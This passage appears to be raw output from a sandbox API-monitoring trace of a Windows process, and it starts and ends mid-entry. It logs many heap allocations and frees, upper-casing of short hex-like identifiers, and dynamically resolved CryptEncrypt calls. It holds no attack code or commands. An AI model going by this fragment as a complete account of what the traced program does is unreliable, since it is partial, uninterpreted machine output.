Size=0x8) returned 0x2a71eb8 [0222.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0222.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0222.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0222.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0222.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0222.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0222.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0222.281] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0222.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0222.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0222.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0222.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0222.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0222.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0222.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0222.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0222.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0222.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0222.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0222.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0222.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0222.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0222.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0222.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f68 | out: hHeap=0x2af0000) returned 1 [0222.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0222.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0222.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0222.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0222.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0222.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0222.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0222.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0222.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0222.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0222.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0222.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0222.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0222.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0222.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0222.283] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0222.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0222.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab860 [0222.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a739c8 [0222.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0222.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0222.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0222.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0222.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0222.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0222.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0222.284] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0222.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0222.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0222.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0222.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0222.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0222.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0222.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0222.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0222.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0222.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0222.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0222.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0222.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0222.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0222.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0222.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0222.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0222.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0222.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a739c8 | out: hHeap=0x2af0000) returned 1 [0222.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0222.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0222.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0222.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0222.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0222.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0222.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0222.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0222.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0222.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0222.286] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0222.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab878 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0222.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0222.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0222.286] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0222.289] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0222.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0222.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0222.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0222.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0222.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0222.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0222.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabbc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0222.290] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0222.290] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0222.290] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.290] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.290] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0222.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabaa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0222.290] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71ec8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71ec8*, 